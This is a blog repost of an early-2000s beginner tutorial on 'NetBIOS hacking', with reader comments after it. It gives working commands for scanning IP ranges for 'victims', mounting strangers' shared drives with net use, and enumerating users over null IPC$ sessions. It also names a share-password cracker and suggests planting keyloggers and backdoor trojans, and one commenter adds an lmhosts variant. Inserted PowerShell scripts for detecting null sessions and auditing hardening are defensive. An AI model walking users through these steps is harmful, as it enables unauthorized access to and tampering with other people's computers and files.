NetBIOS Hacking Tutorial (Text)

24 09 2006

Hack Tutorial via info-x.co.uk
This is a nice tutorial for us n00bs:


NetBIOS based hacking tutorial by Gaurav Kumar

Preface

Dear reader, I have written this tutorial keeping in mind that readers with only basic knowledge will also be able to understand how hackers hack using NetBIOS. Using NetBIOS is probably the easiest way to hack remotely. I strongly oppose hacking, but not ethical hacking. An ethical hacker is one who hacks computer networks not for antisocial reasons but to let the network administrators know about the security holes so that they can protect their computers from being hacked. If you want to contact me, please send a mail to gaurav@sec33.com

Contents-

A brief lesson on NetBIOS

The NBTSTAT command

What you need to hack?

Types of attacks

Searching for a victim

Let's Hack – Part 1 Remotely reading/writing to a victim's computer

Cracking “Share “passwords

Using IPC$ to hack Windows NT

Penetrating in to the victim’s computer

Let's Hack – Part 2 Denial of service attack

How to protect yourself

____________________________________________

A BRIEF LESSON ON NETBIOS

NetBIOS stands for Network Basic Input Output System. It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience working on a LAN using Microsoft Windows operating systems (like Windows 98, Windows Me, Windows NT etc.), you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking on the icon you would have seen the names of the computers. Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network by issuing a command to NetBIOS. NetBIOS returns the names of the computers that have been registered. In short, NetBIOS gives various information about the computers on a network. These include-

Name of the computer

Username

Domain

Computer Name

and many others.

Like any other service it works on a port; the NetBIOS session service has been assigned port number 139 (TCP). Note that the NetBIOS name service runs on UDP port 137 and the datagram service on UDP port 138, and from Windows 2000 onward SMB file sharing also listens directly on TCP port 445, so blocking port 139 alone does not close file sharing.

_____________________________________________

THE NBTSTAT COMMAND

You can interact manually with NetBIOS with the help of the NBTSTAT command. To use this command, click the Start button, select RUN… and type "command" without quotes to launch the MS-DOS command prompt. Alternatively, click the Start button, go to Programs and then select Command Prompt. Once you are in the command prompt you can exit by typing the command EXIT. To launch the command prompt in full-screen mode press the ALT+ENTER key combination; to get back to the original window press ALT+ENTER again. Once you have launched the command prompt you will get

c:\windows>

If you do not see "windows" displayed after c:\, don't worry, just keep going; all required commands will work fine.

Now let's play with the NBTSTAT command.

If you want more help from MS-DOS about this command, type NBTSTAT /? at the prompt, i.e.

c:\windows>nbtstat /?

If you want to get the NetBIOS information of your own computer, type the following command

c:\windows>nbtstat -a 127.0.0.1

This command will list the NetBIOS information. A typical example

NetBIOS Remote Machine Name Table

   Name           Number   Type   Usage
   ==========================================================
   workgroup      00       G      Domain Name
   my_computer    03       U      Messenger Service
   myusername     03       U      Messenger Service

MAC Address = 00-02-44-14-23-E6
Please note that we have used the IP address 127.0.0.1. This is called the "loopback" IP address because it always refers to the computer you are using.

This example is self-explanatory; we need not go into details. We only need to know about the Name and Number columns. Name shows the registered NetBIOS name, and Number is the corresponding hexadecimal suffix that identifies the service the name belongs to. You may see some additional names in your case.

If you want to get the NetBIOS names of a remote computer, the command is

c:\windows>nbtstat -a ipaddress

Example - To get the NetBIOS names of a computer having the IP address 203.195.136.156, we shall use the command

NOTE - 203.195.136.156 may be an active IP address of someone's computer. I am using it only as an example. Please don't hack this computer.

c:\windows>nbtstat -a 203.195.136.156

If you want to know more about IP addresses and ports, click here
___________________

WHAT YOU NEED TO HACK

All you need is a Windows-based operating system like Windows 98 or Me (but I prefer Windows NT, 2000, XP) and an internet connection.
___________________________________________
TYPES OF ATTACKS

We can launch two types of attack on a remote computer running NetBIOS.

1. Reading/Writing to a remote computer system

2. Denial of Service

____________________________________________

Searching for a victim

You may manually search for victims by first using nbtstat -a ipaddress and then net view \\ipaddress. If at first you don't succeed, step to the next IP address until you find a suitable one. You may also use a port scanner. A port scanner is simply software that searches a block of IP addresses, say 192.168.0.1 to 192.168.0.255, for one or more open ports. "Orge" is a port scanner that gives the NetBIOS names of the remote computer.

___________________________________________

Let's Hack – Part 1 Remotely reading/writing to a victim's computer

Believe it or not, NetBIOS is the easiest method to break into somebody's computer. However, there is a condition that must be satisfied before you can hack: the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it, the nbtstat command will display one more NetBIOS name. Now let us take an example. Suppose you know an IP address on which File And Printer Sharing is enabled, and let us suppose the IP address happens to be 203.195.136.156.

If you would like to know more about IP addresses, click here. If you don't know an IP address where File and Printer Sharing is enabled, read "Searching for a victim".

The command that you will use to view the NetBIOS names is

c:\windows>nbtstat -a 203.195.136.156

Let us suppose that the output comes out to be

NetBIOS Remote Machine Name Table

   Name             Type      Status
   ----------------------------------------
   user       <00>  UNIQUE    Registered
   workgroup  <00>  GROUP     Registered
   user       <03>  UNIQUE    Registered
   user       <20>  UNIQUE    Registered

MAC Address = 00-02-44-14-23-E6

The number <20> shows that the victim has enabled File And Printer Sharing.

NOTE - If you do not see this name there are two possibilities:

1. You do not get the number <20>. This shows that the victim has not enabled File And Printer Sharing.

2. You get "Host not found". This shows that port 139 is closed or the IP address does not exist.

Now our next step is to view the drives or folders the victim is sharing.

We will use the command

c:\windows>net view \\203.195.136.156

Let us suppose we get the following output

Shared resources at \\203.195.136.156
ComputerNameGoesHere

   Share name   Type   Used as   Comment
   ------------------------------------------
   CDISK        Disk

The command completed successfully.

"Disk" shows that the victim is sharing a disk named CDISK. You may also get some additional information like

Shared resources at \\203.195.136.156

ComputerNameGoesHere

   Share name   Type    Used as   Comment
   ------------------------------------------
   HP-6L        Print

"Print" shows that the victim is sharing a printer named HP-6L.

If we are able to connect to the victim's hard disks, folders or printers, we will be able to read from and write to those folders or hard disks, or we may even be able to print on a remote printer! Now let us connect to the victim's hard disk or printer.

Till now we know that there is a computer whose IP address happens to be 203.195.136.156, that File and Printer Sharing is enabled on that computer, and that the victim's shared hard disk is named CDISK.

Now we will connect our computer to that hard disk. After we have connected successfully, a drive will be created on our computer and, on double-clicking it, we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK, our drive will have the same contents as CDISK.

Let's do it.

We will use the NET command to do our work.

Let us suppose we want to make a drive k: on our computer and connect it to the victim's share; we will issue the command

c:\windows>net use k: \\203.195.136.156\CDISK

You may replace the letter k by any other letter.

If the command is successful we will get the confirmation:

The command completed successfully

Now just double-click the My Computer icon on your desktop and you will be a happy hacker!

We have just created a new drive k:. Just double-click it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!


____________________________________________

Cracking Share passwords

Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password cracker, "PQWAK". All you have to do is enter the IP address and the share name and it will recover the password within seconds. Please note that this can crack share passwords only if the remote operating system is one of the following:

Windows 95

Windows 98

Windows Me


_____________________________________________

Using IPC$ to hack Windows NT, 2000, XP

Now you must be thinking of something that can crack share passwords on NT-based operating systems like Windows NT and Windows 2000.

IPC$ is there to help us. It is not a password cracker at all. It is simply a share name (the inter-process communication share) that tells the remote operating system to give guest access, that is, access without asking for a password.

We hackers use IPC$ in this way

c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""

You may replace the letter k by any other letter. If you replace it by "b" (type without quotes) a new drive will be created with drive letter b.

Please note that you won't be able to get access to the victim's shared drives, but you can gather valuable information like the names of all the users, users that have never logged in, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum"; it is my favorite tool, however it is run from the command prompt.
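As an added example (not from the tutorial or its author), here is how an administrator can spot the null-session technique described above from the other side: the script reads the local Security log for network logons by the ANONYMOUS LOGON account, which is what an IPC$ connection made with empty credentials is recorded as. It assumes Windows 7/Server 2008 R2 or later, an elevated PowerShell prompt, and that the "Audit Logon" subcategory is enabled so that event ID 4624 is written.

```powershell
# Added example, not the tutorial's code: list anonymous network logons
# (null sessions) recorded in the local Security log.
function Get-AnonymousNetworkLogon {
    param(
        [int]$Hours = 24,
        [int]$MaxEvents = 5000
    )
    $filter = @{
        LogName   = 'Security'
        Id        = 4624                      # An account was successfully logged on
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Read the EventData fields by name so the script does not depend on field order
            $data = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) {
                $data[$d.Name] = $d.'#text'
            }
            # Logon type 3 = network logon; ANONYMOUS LOGON is the account a null session gets
            if ($data.LogonType -eq '3' -and $data.TargetUserName -eq 'ANONYMOUS LOGON') {
                [pscustomobject]@{
                    Time        = $_.TimeCreated
                    SourceIP    = $data.IpAddress
                    Workstation = $data.WorkstationName
                    AuthPackage = $data.AuthenticationPackageName
                }
            }
        }
}

# Summarise by source address: a single address touching many hosts is the pattern
# to investigate. Domain members generate some legitimate anonymous logons, so
# compare against your baseline rather than treating every hit as an intrusion.
Get-AnonymousNetworkLogon -Hours 24 |
    Group-Object SourceIP |
    Sort-Object Count -Descending |
    Select-Object Count, Name |
    Format-Table -AutoSize
```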

_____________________________________________

Penetrating into the victim's computer

Now that you have access to a remote computer you may be interested in viewing his secret emails, downloading his mp3 songs, and more…

But if you think like a hard-core hacker you would like to play some dirty tricks: you may wish to install a key logger, install a back-door Trojan like NetBus or Back Orifice, or delete or copy some files. All these tasks involve writing to the victim's hard disk. For this you need write access permission.


____________________________________________

Let's Hack – Part 2 Denial of service attack

This type of attack is meant to be launched by computer techies, because it involves using the Linux operating system and compiling C language files. To exploit these vulnerabilities you have to copy exploit code from sites like neworder, securityfocus etc. and compile it.

The two most common vulnerabilities found in NetBIOS are

Vulnerability 1

Vulnerability 2

Another vulnerability that has been found recently is that one can launch a DoS attack against Windows NT, 2000, XP and .NET systems. For detailed information and a patch please visit this link http://www.microsoft.com/technet/treeview/…in/MS02-045.asp.
I have checked my web servers, which are still vulnerable to this type of attack.
_____________________________________________
How to protect yourself
Please visit windowsupdate.microsoft.com and let Windows update itself.
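The advice above covers patching only. As an added example (not part of the tutorial), this PowerShell check audits the settings that the name-table, share and IPC$ techniques in this tutorial depend on: the LSA anonymous-access restrictions, null-session access to the Server service, NetBIOS over TCP/IP on each adapter, and whether ports 139 and 445 are listening. It assumes an elevated prompt and Windows 8/Server 2012 or later for Get-NetTCPConnection.

```powershell
# Added example, not the tutorial's code: audit the settings that close the
# doors this tutorial relies on. Run from an elevated PowerShell prompt.
function Test-NetbiosHardening {
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $srv = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $ifs = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
    $lsaVals = Get-ItemProperty -Path $lsa
    $srvVals = Get-ItemProperty -Path $srv -ErrorAction SilentlyContinue
    $findings = @()

    # Null sessions: RestrictAnonymous 1 or 2 blocks anonymous share enumeration
    if ($lsaVals.RestrictAnonymous -notin 1, 2) {
        $findings += 'RestrictAnonymous is 0 or missing: anonymous share enumeration may be allowed'
    }
    if ($lsaVals.RestrictAnonymousSAM -ne 1) {
        $findings += 'RestrictAnonymousSAM is not 1: anonymous account enumeration may be allowed'
    }
    # An explicit 0 re-opens null sessions to the Server service (IPC$); absent means the default (1)
    if ($srvVals.RestrictNullSessAccess -eq 0) {
        $findings += 'RestrictNullSessAccess is 0: null sessions may reach IPC$'
    }
    if ($srvVals.NullSessionShares) {
        $findings += "NullSessionShares lists: $($srvVals.NullSessionShares -join ', ')"
    }
    # NetBIOS over TCP/IP per adapter: NetbiosOptions 2 = disabled, 0 = DHCP default, 1 = enabled
    foreach ($iface in Get-ChildItem -Path $ifs) {
        $opt = (Get-ItemProperty -Path $iface.PSPath).NetbiosOptions
        if ($opt -ne 2) {
            $findings += "NetBIOS over TCP/IP not disabled on $($iface.PSChildName) (NetbiosOptions=$opt)"
        }
    }
    # 139 is the NetBIOS session port and 445 is direct SMB; both must be firewalled from untrusted networks
    $listeners = Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
        Where-Object { ($_.LocalPort -in 139, 445) -and $_.LocalAddress -ne '127.0.0.1' }
    foreach ($l in $listeners) {
        $findings += "Port $($l.LocalPort) is listening on $($l.LocalAddress): verify the firewall blocks it from the internet"
    }
    return $findings
}

$result = Test-NetbiosHardening
if ($result.Count -eq 0) { 'No findings' } else { $result }
```

Each finding names the setting to change; an empty result means the host no longer answers the techniques in this tutorial anonymously, although Windows Update is still needed for the DoS flaws mentioned above.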
_____________________________________________
The above tutorial has been written by Gaurav Kumar



15 responses

27 08 2007
ermias

let me add this!!
GUI method
firstly open your DOS and give this command
nbtstat -a ip
we want the netbios name that it has, don't forget!
1. open lmhosts which is found in the windows folder
2. then create another file called lmhosts with no extension, I think the first has the extension .sam
3. in your notepad (the file you created before by the name lmhosts)
ip (tab) netbiosname (tab) #PRE
4. give the command nbtstat -R
5. search for computer and enter the netbios name that you already entered in your file.

if any one wants to talk about hacking on this article you are wellcom. mlermias@gmail.com.

6 05 2008
skrewu

stuphid fags

5 11 2008
codehunter

what the f.u.c.k. is this ? this is damn trash whoever wrote this should take some p.uss.y licking classes…..go back to nursery school and lick ur teacher’s cat……..u poor f`u`c`k !

28 09 2011
r00kie

this is the best netbios tute i’ve read!!! keep up the good work🙂

29 10 2011
Bilal Abbasi

what the hell is this
doesn't work
not at all
if somebody can do this then tell me how he can do this plz plz plz

3 05 2012
MANIKANTH

REALLY GOOD ONE, ONE OF THE GOOD MATERIALS I HAVE READ, BUT FROM LINUX I AM NOT ABLE TO EXECUTE THE ABOVE CMDS

15 06 2012
Ronaldinho

I have recently started a site, the info you provide on this web site has helped me tremendously. Thank you for all of your time & work. “Never trust anybody who says ‘trust me.’ Except just this once, of course. – from Steel Beach” by John Varley.

30 06 2012
Sahil

the final step in which we use the command net use: it says system error 53 has occurred, the network path was not found, can you please help me

31 07 2012
surya

final step, i.e. the net use command, goes off with some bloody authentication error…

3 10 2012
swapnil

i am not able to make the drive

